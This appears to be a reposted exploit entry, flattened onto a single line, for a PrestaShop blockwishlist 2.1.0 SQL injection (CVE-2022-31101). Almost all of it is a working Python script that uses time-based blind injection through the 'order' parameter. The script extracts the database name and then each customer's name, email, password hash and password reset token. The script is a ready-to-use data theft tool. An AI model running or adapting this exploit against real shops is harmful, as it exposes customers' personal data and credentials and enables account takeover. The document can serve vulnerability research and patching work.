    Prestashop blockwishlist module 2.1.0 - SQLi

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prestashop blockwishlist module 2.1.0 - SQLi # Date: 29/07/22 # Exploit Author: Karthik UJ (@5up3r541y4n) # Vendor Homepage: https://www.prestashop.com/en # Software Link (blockwishlist): https://github.com/PrestaShop/blockwishlist/releases/tag/v2.1.0 # Software Link (prestashop): https://hub.docker.com/r/prestashop/prestashop/ # Version (blockwishlist): 2.1.0 # Version (prestashop): 1.7.8.1 # Tested on: Linux # CVE: CVE-2022-31101 # This exploit assumes that the website uses 'ps_' as prefix for the table names since it is the default prefix given by PrestaShop import requests url = input("Enter the url of wishlist's endpoint (http://website.com/module/blockwishlist/view?id_wishlist=1): ") # Example: http://website.com/module/blockwishlist/view?id_wishlist=1 cookie = input("Enter cookie value:\n") header = { "Cookie": cookie } # Define static stuff param = "&order=" staticStart = "p.name, (select case when (" staticEnd = ") then (SELECT SLEEP(7)) else 1 end); -- .asc" charset = 'abcdefghijklmnopqrstuvwxyz1234567890_-@!#$%&\'*+/=?^`{|}~' charset = list(charset) emailCharset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_-@!#$%&\'*+/=?^`{|}~.' emailCharset = list(emailCharset) # Query current database name length print("\nFinding db name's length:") for length in range(1, 65): condition = "LENGTH(database())=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: dbLength=length print("Length: ", length, end='') print("\n") break print("Enumerating current database name:") databaseName = '' for i in range(1, dbLength+1): for char in charset: condition = "(SUBSTRING(database()," + str(i) + ",1)='" + char + "')" fullUrl = url + param + staticStart + condition + staticEnd try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') databaseName += char break print() # Enumerate any table prefix = "ps_" tableName = prefix + "customer" staticStart = "p.name, (select case when (" staticEnd1 = ") then (SELECT SLEEP(7)) else 1 end from " + tableName + " where id_customer=" staticEnd2 = "); -- .asc" print("\nEnumerating " + tableName + " table") for id in range(1, 10): condition = "id_customer=" + str(id) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) print("\nOnly " + str(id - 1) + " records found. Exiting...") break except requests.exceptions.Timeout: pass print("\nid = " + str(id)) # Finding firstname length for length in range(0, 100): condition = "LENGTH(firstname)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: firstnameLength=length print("Firstname length: ", length, end='') print() break # Enumerate firstname firstname = '' print("Firstname: ", end='') for i in range(1, length+1): for char in charset: condition = "SUBSTRING(firstname," + str(i) + ",1)='" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') firstname += char break print() # Finding lastname length for length in range(1, 100): condition = "LENGTH(lastname)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: lastnameLength=length print("Lastname length: ", length, end='') print() break # Enumerate lastname lastname = '' print("Lastname: ", end='') for i in range(1, length+1): for char in charset: condition = "SUBSTRING(lastname," + str(i) + ",1)='" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: print(char, end='') firstname += char break print() # Finding email length for length in range(1, 320): condition = "LENGTH(email)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: emailLength=length print("Email length: ", length, end='') print() break # Enumerate email email = '' print("Email: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(email," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') email += char except requests.exceptions.Timeout: print(char, end='') email += char break print() # Finding password hash length for length in range(1, 500): condition = "LENGTH(passwd)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: passwordHashLength=length print("Password hash length: ", length, end='') print() break # Enumerate password hash passwordHash = '' print("Password hash: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(passwd," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') passwordHash += char except requests.exceptions.Timeout: print(char, end='') passwordHash += char break print() # Finding password reset token length for length in range(0, 500): condition = "LENGTH(reset_password_token)=" + str(length) fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) except requests.exceptions.Timeout: passwordResetTokenLength=length print("Password reset token length: ", length, end='') print() break # Enumerate password reset token passwordResetToken = '' print("Password reset token: ", end='') for i in range(1, length+1): for char in emailCharset: condition = "SUBSTRING(reset_password_token," + str(i) + ",1)= BINARY '" + char + "'" fullUrl = url + param + staticStart + condition + staticEnd1 + str(id) + staticEnd2 try: req = requests.get(fullUrl, headers=header, timeout=8) if req.status_code == 500 and char == '.': print(char, end='') passwordResetToken += char except requests.exceptions.Timeout: print(char, end='') passwordResetToken += char break print()